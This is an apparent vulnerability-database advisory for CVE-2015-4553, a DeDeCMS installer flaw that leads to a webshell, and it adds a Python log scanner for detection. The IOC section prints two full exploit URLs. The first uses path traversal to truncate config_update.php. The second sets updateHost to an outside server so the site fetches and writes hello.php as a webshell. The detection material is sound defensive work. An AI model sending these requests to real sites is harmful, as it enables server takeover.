CVE-2015-4553
published 2020-01-06

CVE-2015-4553: A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.

Priority: P2, 74, high
CVSS 3.1 base score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: yes
EPSS: 56.74% (98.9th percentile)

Affected (2 ranges)

Vendor    Product   Version range   Fixed in
dedecms   dedecms   <= 5.6          -
dedecms   dedecms   -               -

Detection & IOCs (extracted from sources)

url: http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php
url: http://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://119.253.3.18:8000/
path: /install/index.php.bak
path: ../data/admin/config_update.php
filename: hello.php
url: http://192.168.204.135/install/hello.php
  • Detect HTTP requests to /install/index.php.bak with query parameter step=11, which triggers the vulnerable code path used to overwrite config_update.php and write arbitrary webshells.
  • Alert on HTTP requests to /install/index.php.bak containing the parameter install_demo_name with path traversal sequences (e.g., '../') targeting config_update.php — Step 1 of the exploit clears the file to enable variable overwrite.
  • Alert on HTTP requests to /install/index.php.bak containing the parameter updateHost pointing to an attacker-controlled external host — Step 2 causes the server to fetch and write a webshell from that host.
  • Monitor for creation of new PHP files (e.g., hello.php) inside the /install/ directory, which is the webshell drop location used in this exploit.
  • Monitor for the file ../data/admin/config_update.php being truncated to 0 bytes, which is the prerequisite condition for Stage 2 of the exploit.
  • Detect outbound HTTP GET requests from the web server process matching the pattern /dedecms/demodata.<lang>.txt, which indicates the server is fetching attacker-controlled webshell content.
  • The exploit uses variable coverage (PHP variable overwrite) via unvalidated GET parameters in index.php.bak; the vulnerable file is a backup (.bak) of the installer that should not be publicly accessible post-installation.
  • Step 1 requires the install directory to still be present and accessible; the attack is only possible if the installer has not been removed after deployment.
  • The $updateHost variable in config_update.php is the critical control point; once config_update.php is zeroed out, the attacker can supply an arbitrary updateHost via GET parameter to redirect file fetching to an attacker-controlled server.

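As an added example (not from this record or the DeDeCMS project), the detection bullets above expressed as a small scanner over constructed access-log lines: it flags requests to the leftover installer backup, tags the parameters of each exploit stage, and uses RFC 5737 test addresses in place of the attacker host.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format); addresses are lab values.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jan/2020:10:00:01 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 200 512
10.0.0.5 - - [06/Jan/2020:10:00:02 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://203.0.113.9:8000/ HTTP/1.1" 200 512
10.0.0.7 - - [06/Jan/2020:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048
10.0.0.8 - - [06/Jan/2020:10:00:04 +0000] "GET /install/index.php.bak?step=1 HTTP/1.1" 404 0
"""
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target: str) -> list[str]:
    # Return the indicator names matched by one request target (path + query).
    parts = urlsplit(target)
    if not unquote(parts.path).endswith("/install/index.php.bak"):
        return []  # only the leftover installer backup is in scope
    # parse_qs decodes once; a second unquote also catches double-encoded traversal
    qs = {k: [unquote(v) for v in vs] for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = ["installer_backup_access"]
    if "11" in qs.get("step", []):
        hits.append("step_11_vulnerable_path")
    demo = qs.get("install_demo_name", [])
    if any("../" in v or "..\\" in v for v in demo):
        hits.append("install_demo_name_traversal")
    if any(v.endswith("config_update.php") for v in demo):
        hits.append("config_update_target")
    if any(v.lower().endswith(".php") and not v.endswith("config_update.php") for v in demo):
        hits.append("php_filename_drop")
    if qs.get("updateHost"):
        hits.append("updateHost_supplied")
    return hits

def exploit_stage(hits: list[str]) -> str:
    # Map matched indicators to the stages described in the notes above.
    if "updateHost_supplied" in hits:
        return "stage2_fetch_webshell"
    if "install_demo_name_traversal" in hits or "config_update_target" in hits:
        return "stage1_truncate_config"
    return "probe"

def scan_log(text: str) -> list[dict]:
    # One alert per log line whose request matches at least one indicator.
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify_request(m["target"])):
            alerts.append({"src": m["src"], "ts": m["ts"], "status": m["status"],
                           "indicators": hits, "stage": exploit_stage(hits)})
    return alerts
```

A plain access to the backup file with no exploit parameters is still reported as a probe, since the file should not be reachable at all after installation.
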
CVSS provenance

NVD, CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 6.5 MEDIUM (AV:N/AC:L/Au:S/C:P/I:P/A:P)